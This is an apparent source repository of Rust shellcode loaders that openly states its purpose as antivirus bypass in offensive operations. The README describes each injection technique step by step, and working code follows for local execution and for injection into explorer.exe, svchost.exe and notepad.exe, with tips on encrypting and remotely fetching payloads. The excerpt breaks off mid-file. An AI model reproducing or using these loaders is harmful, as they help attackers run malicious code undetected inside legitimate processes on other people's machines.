[
  {
    "path": ".gitignore",
    "content": "# Generated by Cargo\r\n# will have compiled files and executables\r\ntarget/\r\n\r\n# These are backup files generated by rustfmt\r\n**/*.rs.bk\r\n\r\n.idea/"
  },
  {
    "path": "Cargo.toml",
    "content": "[workspace]\nresolver = \"2\"\nmembers = [\n    \"asm\",\n    \"create_fiber\",\n    \"create_process\",\n    \"create_remote_thread\",\n    \"create_remote_thread_native\",\n    \"create_thread\",\n    \"create_thread_native\",\n    \"early_bird\",\n    \"etwp_create_etw_thread\",\n    \"memmap2_transmute\",\n    \"module_stomping\",\n    \"nt_queue_apc_thread_ex_local\",\n    \"rtl_create_user_thread\",\n]"
  },
  {
    "path": "LICENSE",
    "content": "MIT License\n\nCopyright (c) 2023 b1n <b1n@b1n.io>\n\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in all\ncopies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\nSOFTWARE.\n"
  },
  {
    "path": "README.md",
    "content": "# 🤖 rust-shellcode 🤖\r\nThis project provides the underlying support for AV bypass in offensive activities.  \r\nThe available shellcode loaders include:\r\n* [asm](#asm)\r\n* [create_fiber](#create_fiber)\r\n* [create_process](#create_process)\r\n* [create_remote_thread](#create_remote_thread)\r\n* [create_remote_thread_native](#create_remote_thread_native)\r\n* [create_thread](#create_thread)\r\n* [create_thread_native](#create_thread_native)\r\n* [early_bird](#early_bird)\r\n* [etwp_create_etw_thread](#etwp_create_etw_thread)\r\n* [memmap2_transmute](#memmap2_transmute)\r\n* [module_stomping](#module_stomping)\r\n* [nt_queue_apc_thread_ex_local](#nt_queue_apc_thread_ex_local)\r\n* [rtl_create_user_thread](#rtl_create_user_thread)\r\n\r\n## Build\r\nThis is a Rust project; you need to install [rust](https://www.rust-lang.org/) first.  \r\nThen you can build it with the following command:\r\n\r\n```shell\r\ncargo build --release\r\n```\r\n\r\nBinaries are in `target/release`.\r\n\r\n## How to use\r\nThis project is just a basic demo; you need to choose the right loading method, \r\nencrypt the SHELLCODE, download the SHELLCODE from the internet, \r\nor use it together with ETW patching, unhooking, etc.\r\n\r\n## asm\r\nSHELLCODE executes locally.\r\n1. link SHELLCODE into the .text section\r\n2. inline asm using the asm! macro\r\n3. call SHELLCODE\r\n\r\n## create_fiber\r\nSHELLCODE executes locally.\r\n1. convert the current thread to a fiber using `ConvertThreadToFiber`\r\n2. alloc memory using `VirtualAlloc`\r\n3. copy SHELLCODE to the allocated memory using `std::ptr::copy`\r\n4. create a fiber using `CreateFiber`\r\n5. jump to SHELLCODE using `SwitchToFiber`\r\n6. jump back\r\n\r\n## create_process\r\nSHELLCODE executes locally.\r\n1. create a process in the `CREATE_SUSPENDED` state using `CreateProcessA`\r\n2. alloc remote memory using `VirtualAllocEx`\r\n3. copy SHELLCODE to the allocated memory using `WriteProcessMemory`\r\n4. change the memory protection to executable using `VirtualProtectEx`\r\n5. get `PROCESS_BASIC_INFORMATION` using `NtQueryInformationProcess`\r\n6. get the `PEB` using `ReadProcessMemory`\r\n7. get the `IMAGE_DOS_HEADER` using `ReadProcessMemory`\r\n8. get the `IMAGE_FILE_HEADER` using `ReadProcessMemory`\r\n9. determine whether `IMAGE_FILE_HEADER.Machine` is x86 or x64\r\n10. get `[IMAGE_OPTIONAL_HEADER32|IMAGE_OPTIONAL_HEADER64]` using `ReadProcessMemory`\r\n11. let `entrypoint` = `ImageBaseAddress` + `[IMAGE_OPTIONAL_HEADER32|IMAGE_OPTIONAL_HEADER64].AddressOfEntryPoint`\r\n12. write a piece of assembly code to the `entrypoint` that jumps to the SHELLCODE using `WriteProcessMemory`\r\n13. resume the process's thread using `ResumeThread`\r\n14. close the opened handles using `CloseHandle`\r\n\r\n## create_remote_thread\r\nSHELLCODE executes remotely.  \r\nInjects into `explorer.exe` by default.\r\n1. get the pid by process name using crate `sysinfo`\r\n2. get a handle using `OpenProcess`\r\n3. alloc remote memory using `VirtualAllocEx`\r\n4. copy SHELLCODE to the allocated memory using `WriteProcessMemory`\r\n5. change the memory protection to executable using `VirtualProtectEx`\r\n6. execute SHELLCODE using `CreateRemoteThread`\r\n7. close the opened handle using `CloseHandle`\r\n\r\n## create_remote_thread_native\r\nSHELLCODE executes remotely.  \r\nInjects into `explorer.exe` by default.  \r\nThis is the same as [create_remote_thread](#create_remote_thread), but without crate `windows-sys`;  \r\nit uses crate `libloading` to get the functions from the DLLs.\r\n\r\n## create_thread\r\nSHELLCODE executes locally.\r\n1. alloc memory using `VirtualAlloc`\r\n2. copy SHELLCODE to the allocated memory using `std::ptr::copy`\r\n3. change the memory protection to executable using `VirtualProtect`\r\n4. execute SHELLCODE using `CreateThread`\r\n5. wait for the thread to exit using `WaitForSingleObject`\r\n\r\n## create_thread_native\r\nSHELLCODE executes locally.  \r\nThis is the same as [create_thread](#create_thread), but without crate `windows-sys`;  \r\nit uses crate `libloading` to get the functions from the DLLs.\r\n\r\n## early_bird\r\nSHELLCODE executes remotely.  \r\nCreates and injects into `svchost.exe` by default.\r\n1. create a process using `CreateProcessA`\r\n2. alloc remote memory using `VirtualAllocEx`\r\n3. copy SHELLCODE to the allocated memory using `WriteProcessMemory`\r\n4. change the memory protection to executable using `VirtualProtectEx`\r\n5. queue SHELLCODE for execution using `QueueUserAPC`\r\n6. resume the process's thread using `ResumeThread`\r\n7. close the opened handles using `CloseHandle`\r\n\r\n## etwp_create_etw_thread\r\nSHELLCODE executes locally.\r\n1. get the `EtwpCreateEtwThread` function from `ntdll` using `LoadLibraryA` and `GetProcAddress`\r\n2. alloc memory using `VirtualAlloc`\r\n3. copy SHELLCODE to the allocated memory using `std::ptr::copy`\r\n4. change the memory protection to executable using `VirtualProtect`\r\n5. execute SHELLCODE using `EtwpCreateEtwThread`\r\n6. wait for the thread to exit using `WaitForSingleObject`\r\n\r\n## memmap2_transmute\r\nSHELLCODE executes locally.\r\n1. alloc memory using crate `memmap2`\r\n2. copy SHELLCODE using the `copy_from_slice` function of the `MmapMut` struct\r\n3. change the memory protection to executable using the `make_exec` function of the `MmapMut` struct\r\n4. convert the memory pointer to an fn type using `transmute`\r\n5. execute the fn\r\n\r\n## module_stomping\r\nSHELLCODE executes remotely.  \r\nInjects into `notepad.exe` by default.\r\n1. get the pid by process name using crate `sysinfo`\r\n2. get a handle using `OpenProcess`\r\n3. alloc remote memory using `VirtualAllocEx`\r\n4. copy the dll path to the allocated memory using `WriteProcessMemory`\r\n5. get the `LoadLibraryA` address using `GetProcAddress` with `GetModuleHandleA`\r\n6. load the dll using `CreateRemoteThread`\r\n7. wait for the created remote thread using `WaitForSingleObject`\r\n8. get the modules using `EnumProcessModules`\r\n9. get the module name using `GetModuleBaseNameA`\r\n10. alloc memory using `HeapAlloc`\r\n11. get the entry_point using `ReadProcessMemory`\r\n12. copy SHELLCODE to the dll entry_point using `WriteProcessMemory`\r\n13. execute SHELLCODE using `CreateRemoteThread`\r\n14. close the opened handle using `CloseHandle`\r\n\r\n## nt_queue_apc_thread_ex_local\r\nSHELLCODE executes locally.\r\n1. get the `NtQueueApcThreadEx` function from `ntdll` using `LoadLibraryA` and `GetProcAddress`\r\n2. alloc memory using `VirtualAlloc`\r\n3. copy SHELLCODE to the allocated memory using `std::ptr::copy`\r\n4. change the memory protection to executable using `VirtualProtect`\r\n5. get the current thread handle using `GetCurrentThread`\r\n6. execute SHELLCODE using `NtQueueApcThreadEx`\r\n\r\n## rtl_create_user_thread\r\nSHELLCODE executes remotely.  \r\nInjects into `explorer.exe` by default.\r\n1. get the `RtlCreateUserThread` function from `ntdll` using `LoadLibraryA` and `GetProcAddress`\r\n2. get the pid by process name using crate `sysinfo`\r\n3. get a handle using `OpenProcess`\r\n4. alloc remote memory using `VirtualAllocEx`\r\n5. copy SHELLCODE to the allocated memory using `WriteProcessMemory`\r\n6. change the memory protection to executable using `VirtualProtectEx`\r\n7. execute SHELLCODE using `RtlCreateUserThread`\r\n8. close the opened handle using `CloseHandle`\r\n"
  },
  {
    "path": "asm/Cargo.toml",
    "content": "[package]\nname = \"asm\"\nversion = \"0.1.0\"\nedition = \"2021\"\n\n# See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html\n\n[dependencies]\n"
  },
  {
    "path": "asm/src/main.rs",
    "content": "use std::arch::asm;\n\n#[cfg(target_os = \"windows\")]\nfn main() {\n    #[link_section = \".text\"]\n    static SHELLCODE: [u8; 98] = *include_bytes!(\"../../w64-exec-calc-shellcode-func.bin\");\n\n    unsafe {\n        asm!(\n        \"call {}\",\n        in(reg) SHELLCODE.as_ptr(),\n        )\n    }\n}\n"
  },
  {
    "path": "create_fiber/Cargo.toml",
    "content": "[package]\nname = \"create_fiber\"\nversion = \"0.1.0\"\nedition = \"2021\"\n\n# See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html\n\n[dependencies]\nwindows-sys = { version = \"0.48.0\", features = [\"Win32_System_Threading\", \"Win32_System_Memory\", \"Win32_Foundation\"] }\n"
  },
  {
    "path": "create_fiber/src/main.rs",
    "content": "use std::mem::transmute;\nuse std::ptr::{copy, null};\nuse windows_sys::Win32::Foundation::{GetLastError, FALSE};\nuse windows_sys::Win32::System::Memory::{\n    VirtualAlloc, VirtualProtect, MEM_COMMIT, MEM_RESERVE, PAGE_EXECUTE, PAGE_READWRITE,\n};\nuse windows_sys::Win32::System::Threading::{ConvertThreadToFiber, CreateFiber, SwitchToFiber};\n\n#[cfg(target_os = \"windows\")]\nfn main() {\n    let shellcode = include_bytes!(\"../../w64-exec-calc-shellcode-func.bin\");\n    let shellcode_size = shellcode.len();\n\n    unsafe {\n        let main_fiber = ConvertThreadToFiber(null());\n        if main_fiber.is_null() {\n            panic!(\"[-]ConvertThreadToFiber failed: {}!\", GetLastError());\n        }\n\n        let addr = VirtualAlloc(\n            null(),\n            shellcode_size,\n            MEM_COMMIT | MEM_RESERVE,\n            PAGE_READWRITE,\n        );\n        if addr.is_null() {\n            panic!(\"[-]VirtualAlloc failed: {}!\", GetLastError());\n        }\n\n        let mut old = PAGE_READWRITE;\n        copy(shellcode.as_ptr(), addr.cast(), shellcode_size);\n        let res = VirtualProtect(addr, shellcode_size, PAGE_EXECUTE, &mut old);\n        if res == FALSE {\n            panic!(\"[-]VirtualProtect failed: {}!\", GetLastError());\n        }\n\n        let func = transmute(addr);\n        let fiber = CreateFiber(0, func, null());\n        if fiber.is_null() {\n            panic!(\"[-]CreateFiber failed: {}!\", GetLastError());\n        }\n\n        SwitchToFiber(fiber);\n        SwitchToFiber(main_fiber);\n    }\n}\n"
  },
  {
    "path": "create_process/Cargo.toml",
    "content": "[package]\nname = \"create_process\"\nversion = \"0.1.0\"\nedition = \"2021\"\n\n# See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html\n\n[dependencies]\nwindows-sys = { version = \"0.48.0\", features = [\"Win32_System_Threading\", \"Win32_Foundation\", \"Win32_Security\", \"Win32_System_Diagnostics_Debug\", \"Win32_System_Memory\", \"Win32_System_Kernel\", \"Win32_System_SystemServices\", \"Win32_System_SystemInformation\"] }\n"
  },
  {
    "path": "create_process/src/main.rs",
    "content": "use std::ffi::{c_char, c_void};\nuse std::mem::{size_of_val, zeroed};\nuse std::ptr::{addr_of, addr_of_mut, null, null_mut};\nuse windows_sys::Win32::Foundation::{CloseHandle, GetLastError, FALSE, STATUS_SUCCESS, TRUE};\nuse windows_sys::Win32::System::Diagnostics::Debug::{\n    ReadProcessMemory, WriteProcessMemory, IMAGE_FILE_HEADER, IMAGE_OPTIONAL_HEADER32,\n    IMAGE_OPTIONAL_HEADER64,\n};\nuse windows_sys::Win32::System::Memory::{\n    VirtualAllocEx, VirtualProtectEx, MEM_COMMIT, MEM_RESERVE, PAGE_EXECUTE_READ, PAGE_READWRITE,\n};\nuse windows_sys::Win32::System::SystemServices::IMAGE_DOS_HEADER;\nuse windows_sys::Win32::System::Threading::{\n    CreateProcessA, NtQueryInformationProcess, ResumeThread, CREATE_SUSPENDED,\n    PROCESS_BASIC_INFORMATION, PROCESS_INFORMATION, STARTF_USESTDHANDLES, STARTUPINFOA,\n};\n\nconst X64: u16 = 0x8664_u16;\nconst X86: u16 = 0x14c_u16;\nconst MZ: u16 = 0x5a4d_u16;\nconst PE: u32 = 0x4550_u32;\n\n#[cfg(target_os = \"windows\")]\nfn main() {\n    let shellcode = include_bytes!(\"../../w64-exec-calc-shellcode-func.bin\");\n    let shellcode_size = shellcode.len();\n    let program = b\"C:\\\\Windows\\\\System32\\\\calc.exe\\0\";\n\n    #[repr(C)]\n    struct Peb {\n        reserved: [c_char; 0x10],\n        image_base_address: *mut c_void,\n    }\n\n    unsafe {\n        let mut process_info: PROCESS_INFORMATION = zeroed();\n\n        let mut startup_info: STARTUPINFOA = zeroed();\n        startup_info.dwFlags = STARTF_USESTDHANDLES | CREATE_SUSPENDED;\n        startup_info.wShowWindow = 1;\n\n        let res = CreateProcessA(\n            program.as_ptr(),\n            null_mut(),\n            null(),\n            null(),\n            TRUE,\n            CREATE_SUSPENDED,\n            null(),\n            null(),\n            addr_of!(startup_info),\n            addr_of_mut!(process_info),\n        );\n        if res == FALSE {\n            panic!(\"[-]CreateProcessA failed: {}!\", GetLastError());\n        }\n\n        let addr = VirtualAllocEx(\n            process_info.hProcess,\n            null(),\n            shellcode_size,\n            MEM_COMMIT | MEM_RESERVE,\n            PAGE_READWRITE,\n        );\n        if addr.is_null() {\n            panic!(\"[-]VirtualAllocEx failed: {}!\", GetLastError());\n        }\n\n        let res = WriteProcessMemory(\n            process_info.hProcess,\n            addr,\n            shellcode.as_ptr().cast(),\n            shellcode_size,\n            null_mut(),\n        );\n        if res == FALSE {\n            panic!(\"[-]WriteProcessMemory failed: {}!\", GetLastError());\n        }\n\n        let mut old = PAGE_READWRITE;\n        let res = VirtualProtectEx(\n            process_info.hProcess,\n            addr,\n            shellcode_size,\n            PAGE_EXECUTE_READ,\n            addr_of_mut!(old),\n        );\n        if res == FALSE {\n            panic!(\"[-]VirtualProtectEx failed: {}!\", GetLastError());\n        }\n\n        let mut process_basic_info: PROCESS_BASIC_INFORMATION = zeroed();\n        let res = NtQueryInformationProcess(\n            process_info.hProcess,\n            0,\n            addr_of_mut!(process_basic_info).cast(),\n            u32::try_from(size_of_val(&process_basic_info)).expect(\"[-]u32::try_from failed!\"),\n            null_mut(),\n        );\n        if res != STATUS_SUCCESS {\n            panic!(\"[-]NtQueryInformationProcess failed: {}!\", GetLastError());\n        }\n\n        let read_process_memory = |addr: *const c_void, out: *mut c_void, size: usize| {\n            let res = ReadProcessMemory(process_info.hProcess, addr, out, size, null_mut());\n            if res == FALSE {\n                panic!(\"[-]ReadProcessMemory failed: {}!\", GetLastError());\n            }\n        };\n\n        let mut peb: Peb = zeroed();\n        read_process_memory(\n            process_basic_info.PebBaseAddress.cast(),\n            addr_of_mut!(peb).cast(),\n            size_of_val(&peb),\n        );\n\n        let mut dos_header: IMAGE_DOS_HEADER = zeroed();\n        read_process_memory(\n            peb.image_base_address,\n            addr_of_mut!(dos_header).cast(),\n            size_of_val(&dos_header),\n        );\n        if dos_header.e_magic != MZ {\n            panic!(\"[-]DOS image header magic was not 0x5a4d!\");\n        }\n\n        let mut signature = 0u32;\n        read_process_memory(\n            ((peb.image_base_address as usize) + (dos_header.e_lfanew as usize)) as *const c_void,\n            addr_of_mut!(signature).cast(),\n            size_of_val(&signature),\n        );\n        if signature != PE {\n            panic!(\"[-]PE Signature was not 0x4550\");\n        }\n\n        let mut pe_header: IMAGE_FILE_HEADER = zeroed();\n        read_process_memory(\n            ((peb.image_base_address as usize)\n                + (dos_header.e_lfanew as usize)\n                + size_of_val(&signature)) as *const c_void,\n            addr_of_mut!(pe_header).cast(),\n            size_of_val(&pe_header),\n        );\n\n        let entrypoint;\n        let mut ep_buffer = vec![];\n\n        let read_opt_header = |header: *mut c_void, size: usize| {\n            read_process_memory(\n                ((peb.image_base_address as usize)\n                    + (dos_header.e_lfanew as usize)\n                    + size_of_val(&signature)\n                    + size_of_val(&pe_header)) as *const c_void,\n                header,\n                size,\n            );\n        };\n\n        match pe_header.Machine {\n            X64 => {\n                let mut opt_header: IMAGE_OPTIONAL_HEADER64 = zeroed();\n                read_opt_header(addr_of_mut!(opt_header).cast(), size_of_val(&opt_header));\n\n                entrypoint = ((peb.image_base_address as usize)\n                    + usize::try_from(opt_header.AddressOfEntryPoint)\n                        .expect(\"[-]usize::try_from failed!\"))\n                    as *mut c_void;\n\n                // REX.W prefix; mov rax, imm64\n                ep_buffer.push(0x48_u8);\n                ep_buffer.push(0xb8_u8);\n                let mut shellcode_addr = (addr as usize).to_le_bytes().to_vec();\n                ep_buffer.append(&mut shellcode_addr);\n            }\n            X86 => {\n                let mut opt_header: IMAGE_OPTIONAL_HEADER32 = zeroed();\n                read_opt_header(addr_of_mut!(opt_header).cast(), size_of_val(&opt_header));\n\n                entrypoint = ((peb.image_base_address as usize)\n                    + usize::try_from(opt_header.AddressOfEntryPoint)\n                        .expect(\"[-]usize::try_from failed!\"))\n                    as *mut c_void;\n\n                // mov eax, imm32\n                ep_buffer.push(0xb8_u8);\n                let mut shellcode_addr = (addr as usize).to_le_bytes().to_vec();\n                ep_buffer.append(&mut shellcode_addr);\n            }\n            _ => panic!(\n                \"[-]Unknown IMAGE_OPTIONAL_HEADER type for machine type: {:#x}\",\n                pe_header.Machine\n            ),\n        }\n\n        // jmp [r|e]ax\n        ep_buffer.push(0xff_u8);\n        ep_buffer.push(0xe0_u8);\n\n        let res = WriteProcessMemory(\n            process_info.hProcess,\n            entrypoint,\n            ep_buffer.as_ptr().cast(),\n            ep_buffer.len(),\n            null_mut(),\n        );\n        if res == FALSE {\n            panic!(\"[-]WriteProcessMemory failed: {}!\", GetLastError());\n        }\n\n        let res = ResumeThread(process_info.hThread);\n        if res == 0u32 {\n            panic!(\"[-]ResumeThread failed: {}!\", GetLastError());\n        }\n\n        let res = CloseHandle(process_info.hProcess);\n        if res == FALSE {\n            panic!(\"[-]CloseHandle failed: {}!\", GetLastError());\n        }\n\n        let res = CloseHandle(process_info.hThread);\n        if res == FALSE {\n            panic!(\"[-]CloseHandle failed: {}!\", GetLastError());\n        }\n    }\n}\n"
  },
  {
    "path": "create_remote_thread/Cargo.toml",
    "content": "[package]\nname = \"create_remote_thread\"\nversion = \"0.1.0\"\nedition = \"2021\"\n\n# See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html\n\n[dependencies]\nsysinfo = \"0.29.0\"\nwindows-sys = { version = \"0.48.0\", features = [\"Win32_System_Memory\", \"Win32_Foundation\", \"Win32_System_Threading\", \"Win32_System_Diagnostics_Debug\", \"Win32_Security\"] }\n"
  },
  {
    "path": "create_remote_thread/src/main.rs",
    "content": "use std::mem::transmute;\nuse std::ptr::{null, null_mut};\nuse sysinfo::{PidExt, ProcessExt, System, SystemExt};\nuse windows_sys::Win32::Foundation::{CloseHandle, GetLastError, FALSE};\nuse windows_sys::Win32::System::Diagnostics::Debug::WriteProcessMemory;\nuse windows_sys::Win32::System::Memory::{\n    VirtualAllocEx, VirtualProtectEx, MEM_COMMIT, MEM_RESERVE, PAGE_EXECUTE, PAGE_READWRITE,\n};\nuse windows_sys::Win32::System::Threading::{CreateRemoteThread, OpenProcess, PROCESS_ALL_ACCESS};\n\n#[cfg(target_os = \"windows\")]\nfn main() {\n    let shellcode = include_bytes!(\"../../w64-exec-calc-shellcode-func.bin\");\n    let shellcode_size = shellcode.len();\n\n    let mut system = System::new();\n    system.refresh_processes();\n\n    let pid = system\n        .processes_by_name(\"explorer.exe\")\n        .next()\n        .expect(\"[-]no process!\")\n        .pid()\n        .as_u32();\n\n    unsafe {\n        let handle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);\n        if handle == 0 {\n            panic!(\"[-]OpenProcess failed: {}!\", GetLastError());\n        }\n\n        let addr = VirtualAllocEx(\n            handle,\n            null(),\n            shellcode_size,\n            MEM_COMMIT | MEM_RESERVE,\n            PAGE_READWRITE,\n        );\n        if addr.is_null() {\n            panic!(\"[-]VirtualAllocEx failed: {}!\", GetLastError());\n        }\n\n        let res = WriteProcessMemory(\n            handle,\n            addr,\n            shellcode.as_ptr().cast(),\n            shellcode_size,\n            null_mut(),\n        );\n        if res == FALSE {\n            panic!(\"[-]WriteProcessMemory failed: {}!\", GetLastError());\n        }\n\n        let mut old = PAGE_READWRITE;\n        let res = VirtualProtectEx(handle, addr, shellcode_size, PAGE_EXECUTE, &mut old);\n        if res == FALSE {\n            panic!(\"[-]VirtualProtectEx failed: {}!\", GetLastError());\n        }\n\n        let func = transmute(addr);\n        let thread = CreateRemoteThread(handle, null(), 0, func, null(), 0, null_mut());\n        if thread == 0 {\n            panic!(\"[-]CreateRemoteThread failed: {}!\", GetLastError());\n        }\n\n        let res = CloseHandle(handle);\n        if res == FALSE {\n            panic!(\"[-]CloseHandle failed: {}!\", GetLastError());\n        }\n    }\n}\n"
  },
  {
    "path": "create_remote_thread_native/Cargo.toml",
    "content": "[package]\nname = \"create_remote_thread_native\"\nversion = \"0.1.0\"\nedition = \"2021\"\n\n# See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html\n\n[dependencies]\nlibloading = \"0.8.0\"\nsysinfo = \"0.29.0\"\n"
  },
  {
    "path": "create_remote_thread_native/src/main.rs",
    "content": "use libloading::{Library, Symbol};\nuse std::ffi::c_void;\nuse std::ptr::{null, null_mut};\nuse sysinfo::{PidExt, ProcessExt, System, SystemExt};\n\nconst PROCESS_ALL_ACCESS: u32 = 0x1fffff;\nconst MEM_COMMIT: u32 = 0x1000;\nconst MEM_RESERVE: u32 = 0x2000;\nconst PAGE_EXECUTE: u32 = 0x10;\nconst PAGE_READWRITE: u32 = 0x04;\nconst FALSE: i32 = 0;\n\n#[cfg(target_os = \"windows\")]\nfn main() {\n    let shellcode = include_bytes!(\"../../w64-exec-calc-shellcode-func.bin\");\n    let shellcode_size = shellcode.len();\n\n    let mut system = System::new();\n    system.refresh_processes();\n    let pid = system\n        .processes_by_name(\"explorer.exe\")\n        .next()\n        .expect(\"[-]no process!\")\n        .pid()\n        .as_u32();\n\n    unsafe {\n        let kernel32 = Library::new(\"kernel32.dll\").expect(\"[-]no kernel32.dll!\");\n\n        let get_last_error: Symbol<unsafe extern \"C\" fn() -> u32> = kernel32\n            .get(b\"GetLastError\\0\")\n            .expect(\"[-]no GetLastError!\");\n\n        let open_process: Symbol<unsafe extern \"C\" fn(u32, i32, u32) -> isize> =\n            kernel32.get(b\"OpenProcess\\0\").expect(\"[-]no OpenProcess!\");\n\n        let virtual_alloc_ex: Symbol<\n            unsafe extern \"C\" fn(isize, *const c_void, usize, u32, u32) -> *mut c_void,\n        > = kernel32\n            .get(b\"VirtualAllocEx\\0\")\n            .expect(\"[-]no VirtualAllocEx!\");\n\n        let write_process_memory: Symbol<\n            unsafe extern \"C\" fn(isize, *const c_void, *const c_void, usize, *mut usize) -> i32,\n        > = kernel32\n            .get(b\"WriteProcessMemory\\0\")\n            .expect(\"[-]no WriteProcessMemory!\");\n\n        let virtual_protect_ex: Symbol<\n            unsafe extern \"C\" fn(isize, *const c_void, usize, u32, *mut u32) -> i32,\n        > = kernel32\n            .get(b\"VirtualProtectEx\\0\")\n            .expect(\"[-]no VirtualProtectEx!\");\n\n        let create_remote_thread: Symbol<\n            unsafe extern \"C\" fn(\n                isize,\n                *const c_void,\n                usize,\n                *const c_void,\n                u32,\n                *mut u32,\n            ) -> isize,\n        > = kernel32\n            .get(b\"CreateRemoteThread\\0\")\n            .expect(\"[-]no CreateRemoteThread!\");\n\n        let close_handle: Symbol<unsafe extern \"C\" fn(isize) -> i32> =\n            kernel32.get(b\"CloseHandle\").expect(\"[-]no CloseHandle!\");\n\n        let handle = open_process(PROCESS_ALL_ACCESS, 0, pid);\n        if handle == 0 {\n            panic!(\"[-]OpenProcess failed: {}!\", get_last_error());\n        }\n\n        let addr = virtual_alloc_ex(\n            handle,\n            null(),\n            shellcode_size,\n            MEM_COMMIT | MEM_RESERVE,\n            PAGE_READWRITE,\n        );\n        if addr.is_null() {\n            panic!(\"[-]virtual_alloc_ex failed: {}!\", get_last_error());\n        }\n\n        let res = write_process_memory(\n            handle,\n            addr,\n            shellcode.as_ptr().cast(),\n            shellcode_size,\n            null_mut(),\n        );\n        if res == FALSE {\n            panic!(\"[-]write_process_memory failed: {}!\", get_last_error());\n        }\n\n        let mut old = PAGE_READWRITE;\n        let res = virtual_protect_ex(handle, addr, shellcode_size, PAGE_EXECUTE, &mut old);\n        if res == FALSE {\n            panic!(\"[-]virtual_protect_ex failed: {}!\", get_last_error());\n        }\n\n        let thread = create_remote_thread(handle, null(), 0, addr, 0, null_mut());\n        if thread == 0 {\n            panic!(\"[-]create_remote_thread failed: {}!\", get_last_error());\n        }\n\n        let res = close_handle(handle);\n        if res == FALSE {\n            panic!(\"[-]close_handle failed: {}!\", get_last_error());\n        }\n    }\n}\n"
  },
  {
    "path": "create_thread/Cargo.toml",
    "content": "[package]\nname = \"create_thread\"\nversion = \"0.1.0\"\nedition = \"2021\"\n\n# See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html\n\n[dependencies]\nwindows-sys = { version = \"0.48.0\", features = [\"Win32_System_Memory\", \"Win32_Foundation\", \"Win32_System_Threading\", \"Win32_Security\"] }"
  },
  {
    "path": "create_thread/src/main.rs",
    "content": "use std::mem::transmute;\nuse std::ptr::{copy, null, null_mut};\nuse windows_sys::Win32::Foundation::{GetLastError, FALSE, WAIT_FAILED};\nuse windows_sys::Win32::System::Memory::{\n    VirtualAlloc, VirtualProtect, MEM_COMMIT, MEM_RESERVE, PAGE_EXECUTE, PAGE_READWRITE,\n};\nuse windows_sys::Win32::System::Threading::{CreateThread, WaitForSingleObject};\n\n#[cfg(target_os = \"windows\")]\nfn main() {\n    let shellcode = include_bytes!(\"../../w64-exec-calc-shellcode-func.bin\");\n    let shellcode_size = shellcode.len();\n\n    unsafe {\n        let addr = VirtualAlloc(\n            null(),\n            shellcode_size,\n            MEM_COMMIT | MEM_RESERVE,\n            PAGE_READWRITE,\n        );\n        if addr.is_null() {\n            panic!(\"[-]VirtualAlloc failed: {}!\", GetLastError());\n        }\n\n        copy(shellcode.as_ptr(), addr.cast(), shellcode_size);\n\n        let mut old = PAGE_READWRITE;\n        let res = VirtualProtect(addr, shellcode_size, PAGE_EXECUTE, &mut old);\n        if res == FALSE {\n            panic!(\"[-]VirtualProtect failed: {}!\", GetLastError());\n        }\n\n        let addr = transmute(addr);\n        let thread = CreateThread(null(), 0, addr, null(), 0, null_mut());\n        if thread == 0 {\n            panic!(\"[-]CreateThread failed: {}!\", GetLastError());\n        }\n\n        WaitForSingleObject(thread, WAIT_FAILED);\n    }\n}\n"
  },
  {
    "path": "create_thread_native/Cargo.toml",
    "content": "[package]\nname = \"create_thread_native\"\nversion = \"0.1.0\"\nedition = \"2021\"\n\n# See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html\n\n[dependencies]\nlibloading = \"0.8.0\""
  },
  {
    "path": "create_thread_native/src/main.rs",
    "content": "use libloading::{Library, Symbol};\nuse std::ffi::c_void;\nuse std::ptr::{null, null_mut};\n\nconst MEM_COMMIT: u32 = 0x1000;\nconst MEM_RESERVE: u32 = 0x2000;\nconst PAGE_EXECUTE: u32 = 0x10;\nconst PAGE_READWRITE: u32 = 0x04;\nconst FALSE: i32 = 0;\nconst WAIT_FAILED: u32 = 0xFFFFFFFF;\n\n#[cfg(target_os = \"windows\")]\nfn main() {\n    let shellcode = include_bytes!(\"../../w64-exec-calc-shellcode-func.bin\");\n    let shellcode_size = shellcode.len();\n\n    unsafe {\n        let kernel32 = Library::new(\"kernel32.dll\").expect(\"[-]no kernel32.dll!\");\n        let ntdll = Library::new(\"ntdll.dll\").expect(\"[-]no ntdll.dll!\");\n\n        let get_last_error: Symbol<unsafe extern \"C\" fn() -> u32> = kernel32\n            .get(b\"GetLastError\\0\")\n            .expect(\"[-]no GetLastError!\");\n\n        let virtual_alloc: Symbol<\n            unsafe extern \"C\" fn(*const c_void, usize, u32, u32) -> *mut c_void,\n        > = kernel32\n            .get(b\"VirtualAlloc\\0\")\n            .expect(\"[-]no VirtualAlloc!\");\n\n        let virtual_protect: Symbol<\n            unsafe extern \"C\" fn(*const c_void, usize, u32, *mut u32) -> i32,\n        > = kernel32\n            .get(b\"VirtualProtect\\0\")\n            .expect(\"[-]no VirtualProtect!\");\n\n        let rtl_copy_memory: Symbol<unsafe extern \"C\" fn(*mut c_void, *const c_void, usize)> =\n            ntdll.get(b\"RtlCopyMemory\\0\").expect(\"[-]no RtlCopyMemory!\");\n\n        let create_thread: Symbol<\n            unsafe extern \"C\" fn(*const c_void, usize, *const c_void, u32, *mut u32) -> isize,\n        > = kernel32\n            .get(b\"CreateThread\\0\")\n            .expect(\"[-]no CreateThread!\");\n\n        let 